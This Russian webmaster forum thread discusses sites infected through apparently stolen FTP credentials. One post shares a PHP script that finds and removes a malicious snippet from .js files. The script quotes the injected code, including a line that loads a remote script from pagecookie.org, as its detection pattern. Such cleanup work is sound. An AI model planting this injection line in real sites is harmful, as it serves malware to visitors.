Помощник
 |
|
|
|
|
Сообщение сайта
|
 nic.ru - что происходит?, Неожиданные неожиданности от RU-CENTER |
TexT_Tale
|
 7.12.2012, 3:13;
Ответить: TexT_Tale
Сообщение
#22
|
|
Новичок  Группа: User Сообщений: 19 Регистрация: 23.2.2012 Поблагодарили: 1 раз Репутация:  0 
 |
Прошло 2 дня, мои сайты все восстановлены, в панели вебмастер яндекс предупреждение о заражении исчезли.
Что я сделал: Сделал Бэкап сайтов, на тот момент когда сайты были чисты, переустановил Windows на рабочем ПК, сменил доступ Ftp доступа, поставил ограничение по Ip адресу. Так и не разобрался откуда мог прийти данный код, в интернете насчет него очень мало информации. Надеюсь больше такое не повторится....\= |
 |
|
WebGraf
|
7.12.2012, 4:07;
Ответить: WebGraf
Сообщение
#23
|
 Завсегдатай Группа: Active User Сообщений: 996 Регистрация: 13.1.2011 Поблагодарили: 143 раза Репутация: 16
|
Именно про этот вариант я и говорил - трояны ворующие пасы.
-------------------- |
|
|
|
|
Rxp
|
7.12.2012, 11:28;
Ответить: Rxp
Сообщение
#24
|
|
Участник 
 Группа: User Сообщений: 117 Регистрация: 9.11.2008 Поблагодарили: 21 раз Репутация: 10
|
В данном заражении не обезательно причиной могут полужить слитие паролей, элементарно может виноват и сам хостер с его настройками, какой-нибудь не обновленный файл, через который ломали движок. Будьте внимательнее!
-------------------- |
|
|
|
|
WebGraf
|
7.12.2012, 12:48;
Ответить: WebGraf
Сообщение
#25
|
|
Завсегдатай Группа: Active User Сообщений: 996 Регистрация: 13.1.2011 Поблагодарили: 143 раза Репутация: 16
|
Такой крупный как ру-центр? Очень маловероятно!
Такое вполне может быть на хостингах которым 2-3 месяца. -------------------- |
|
|
|
|
TexT_Tale
|
7.12.2012, 14:01;
Ответить: TexT_Tale
Сообщение
#26
|
|
Новичок Группа: User Сообщений: 19 Регистрация: 23.2.2012 Поблагодарили: 1 раз Репутация: 0
|
WebGraf,
Скорее всего вы правы, большая вероятность, что были украдены пасы доступа к Ftp аккаунту. Т.к я очень халатно относился к вопросу безопасности. Конечно не раздавал на право на лево свои пароли, но все же. Смотрел логи входа в аккаунт, именно на то число, когда и были изменены файлы. Заходили не с моего Ip. И делали там, что хотели, как говорится) Хостинг у меня от Hostia.ru отличный хостинг, по моему мнению, техподдержка работает оперативно, сайты летают, падений еще ни разу не было. Да и на рынке хостеров он уж точно больше 3-х месяцев работает)) Не сглазить бы)) А то, что пароли 11 символов, это ни что не значит, если троян ворует пасы, то и 15 значный стащит спокойно. Сообщение отредактировал TexT_Tale - 7.12.2012, 14:03 |
|
|
|
|
WebGraf
|
7.12.2012, 14:40;
Ответить: WebGraf
Сообщение
#27
|
|
Завсегдатай Группа: Active User Сообщений: 996 Регистрация: 13.1.2011 Поблагодарили: 143 раза Репутация: 16
|
Да, вы правы, сложность пароля не имеет значения в этом случае.
Здесь нужен хороший антивирусник с постоянно обновляемой базой (ежедневно), не помешает специализированная утилита по поиску именно троянов (троянримувер или в этом роде). Также спасти может использование менее популярного фтп-клиента. По опыту скажу что ранее трояны были нацелены в основном на тотал коммандер, сейчас в основном на файлзиллу. -------------------- |
|
|
|
|
alex2906
|
7.12.2012, 17:51;
Ответить: alex2906
Сообщение
#28
|
 Бывалый Группа: User Сообщений: 350 Регистрация: 25.8.2010 Поблагодарили: 113 раз Репутация: 19
|
(WebGraf @ 7.12.2012, 13:40)  Также спасти может использование менее популярного фтп-клиента Просто не сохраняйте пароли в FTP-клиентах, лучше пароль и логин каждый раз ручками вводить, чем потом искать шелы на сервере. -------------------- |
|
|
|
|
WebGraf
|
7.12.2012, 19:40;
Ответить: WebGraf
Сообщение
#29
|
|
Завсегдатай Группа: Active User Сообщений: 996 Регистрация: 13.1.2011 Поблагодарили: 143 раза Репутация: 16
|
alex2906, теоретически 100% вы правы, но хранить сотни паролей вида ,r@gXiX[]GCR`gMTx{odB&1k, в памяти или копипастить каждый раз просто неудобно.
-------------------- |
|
|
|
|
rjksdfhe
|
Сообщение
#30
|
 Straight arms Группа: Active User Сообщений: 2760 Регистрация: 21.4.2009 Из: Мытищи, МО, РФ Поблагодарили: 1118 раз Репутация: 163
|
Долго собирался заняться проблемой (т.к. вывел самые важные сайты простой перезаливкой всех js, которые используются на морде). Все эти важные сайты уже давно вышли из-под фильтра, но не те, которые на Joomla и ещё одной х.з. какой CMS, доставшейся в наследство вместе с сайтами.
Кстати, уязвимость не нашёл. Самое большое подозрение - на 2 древних (возрастных и авторитетных  ) сайта на Joomla 1.5, в коде которого копаться... А обновить версию страшно - всё посыпется. Но на тех, что вручную просто обновил все .JS - больше проблем не было, скорее всего это была разовая атака. Хотя и не исключены повторные.Только сегодня руки дошли написать скрипт на PHP, который проверяет весь сервер о закоулкам, ищет и удаляет. Ориентирован сейчас только под pagecookie, но может пригодится кому-то по аналогии. Код написан за час, особо не оптимизировал. Но уже проверено и полностью решило проблему у меня на всех сайтах, размещённых на хостинге. (Как под сплойер поставить? Модераторы, подправьте, пожалуйста. Я не знаю, нет таких кнопок вверху формы ответа.) <h1>Очистка от вируса `pagecookie.org`</h1><hr><? // параметры define ('ROOT_DIR', '/home/guXXXXXrk/'); // корень хостинга define ('MAX_LEVEL', 15); // максимальный уровень директории (вложенности) define ('DEBUG', TRUE); // TRUE: только определяем; FALSE: удаляем ini_set ('max_execution_time', 120); // timeout исполнения скрипта - 2 мин $maxLevel=0; // реальная максимальная рекурсия, выводится в конце для проверки function getDir ($subDir=ROOT_DIR, $level=0) { global $rootDir, $maxLevel; if ($level>$maxLevel) $maxLevel=$level; if ($level>MAX_LEVEL) return; $h=opendir ($rootDir.$subDir); if ($h===FALSE) {echo ("<b style='color:red'>CANNOT OPEN DIR!</b>"); return;} while (FALSE!==($f=readdir ($h))) { if ($f=='.' || $f=='..') continue; $fn=$subDir.$f; $fn2=substr ($subDir, strlen (ROOT_DIR))."<b>$f</b>"; if (is_dir ($fn)) { echo ("<div style='margin-left:20px'>$fn2"); if (substr($fn, -7)=='ssl.key') echo ('SKIP <b>ssl.key</b>'); else getDir ("$fn/", $level+1); echo ("</div>"); } elseif (is_file($fn) && strncmp ('.js', substr($fn, -3), 3)==0) { echo ("<div style='margin-left:20px;color:white'><b style='background:blue'>$fn2</b>"); // проверяем контент $d=file_get_contents ($fn); if (strpos ($d, 'pagecookie.org')!==FALSE) { echo (' <b style="background:red">ЗАРАЖЕНО</b>'); $isOK=FALSE; // начало и контент вредоносного кода $needle1="function g(){var r=new RegExp(\"(?:; )?1=([^;]*);?\");"; $needle2="document.write('<script src=\"http://pagecookie.org/pagecookie.js\"></script>');}"; $p1=strpos ($d, $needle1); if ($p1!==FALSE) { $p2=strpos ($d, $needle2, $p1+strlen($needle1)); if ($p2!==FALSE) { $d=substr($d,0,$p1).substr($d,$p2+strlen($needle2)); $isOK=TRUE; } } if ($isOK) if (DEBUG) echo (' <b style="background:green">ГОТОВО ДЛЯ УДАЛЕНИЯ</b>'); else { // удаляем file_put_contents ($fn, $d); echo (' <b style="background:green">УДАЛЕНО</b>'); } else echo (' <b style="background:yellow">ОШИБКА ПРИ ТОЧНОМ ОПРЕДЕЛЕНИИ КОДА</b>'); } else echo (' <span style="background:green">OK</span>'); echo ("</div>"); } } closedir($h); } // обходим с корня getDir(); // готово echo ("<hr><b>[[DONE]]</b>"); echo ("MAXLEVEL=<b>$maxLevel</b>"); ?> Надо прописать корень хостинга, это понятно. Скрипт запускается в режиме определения, а не изменения. Потом про запуске будет отображаться обход директорий, нормальные (не заражённные) файлы JS будут выглядеть так:  Вот так будут отображаться заражённые файлы:  Если, при проверке глазами, нет сомнений, что определение обработано как надо, измените в скрипте ('DEBUG', TRUE) на ('DEBUG', FALSE). После первой проходки должно всё удалится. На всякий случай, запустите ещё раз (обновите страницу) - проблем уже не должно быть найдено. Сообщение отредактировал rjksdfhe - 10.1.2013, 21:21 |
|
|
|
|
batik
|
10.1.2013, 22:45;
Ответить: batik
Сообщение
#31
|
 Завсегдатай Группа: User Сообщений: 562 Регистрация: 23.9.2010 Из: Лесной Поблагодарили: 290 раз Репутация: 41
|
Была такая же проблема,вылечить то можно, а вот уязвимость найти-совсем другое дело.
Сейчас читаю журнал Хакер за 01(68) 2013, есть интересная статья "Фреймворк для проведения массовых атак через баннерные сети"- кому интересно, прочитайте- не пожалеете совсем никто-)). Похоже, именно так и угоняют акки и админки. Что особо "радует"- заботливо написано :На нашем диске ты сможешь найти все необходимые файлы и исходники. Вся информация предоставлена исключительно в ознакомительных целях.Ни редакция,ни авторы не несут ответственности за любой возможный вред,причиненный материалами данной статьи. Вот спасибо так спасибо.Добрые люди. Но есть и плюс- если известна проблема, пытливый ум завсегда чего нибудь да придумает. И да, уязвимость в джумле 1.5 не только в редакторе, все дружно обновляемся до 2.5. -------------------- |
|
|
|
|
|
Похожие темы
| Тема | Ответов | Автор | Просмотров | Последний ответ | |
|---|---|---|---|---|---|
 |
Во что сегодня инвестировать? Делимся своими приносящими прибыль вариантами |
75 | traveliver | 4932 | Вчера, 16:32 автор: Boymaster |
|
 Во что Вы играете? |
399 | Vmir | 67848 | 23.3.2024, 12:51 автор: Alexand3r |
 |
"Извините, что ожидание затянулось, но не думайте, пожалуйста, что мы про вас забыли. Мы заводим задачи по всем обращениям и контролируем работу над ними самым тщательным образом." Вопрос |
0 | kuz999 | 1243 | 5.2.2024, 14:06 автор: kuz999 |
|
Что приведет к краху всего рынка криптовалют стейблкоины, прогноз |
43 | GlazAlmaz | 5922 | 13.1.2024, 17:30 автор: Antarez |
|
Finkort - Финансовая партнерская сеть. Мы знаем, что вам нужно. | 2 | Finkort | 1612 | 28.9.2023, 16:04 автор: Finkort |
|
Текстовая версия | Сейчас: 20.4.2024, 0:02 |
